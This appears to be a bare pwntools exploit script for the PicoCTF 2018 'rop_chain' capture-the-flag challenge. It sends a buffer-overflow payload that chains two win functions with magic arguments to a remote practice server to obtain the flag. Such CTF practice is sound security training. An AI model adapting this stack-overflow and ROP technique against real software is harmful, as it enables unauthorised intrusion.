exp
from pwn import *
context.log_level = 'debug'
proc_name = './PicoCTF_2018_rop_chain'
p = remote('node3.buuoj.cn', 27027)
elf = ELF(proc_name)
flag_addr = elf.sym['flag']
win_function1 = elf.sym['win_function1']
win_function2 = elf.sym['win_function2']
main_addr = elf.sym['main']
payload = b'a' * (0x18 + 4) + p32(win_function1) + p32(win_function2) + p32(flag_addr) + p32(0xBAAAAAAD) + p32(0xDEADBAAD)
p.sendlineafter('input>', payload)
p.recv()
p.recv()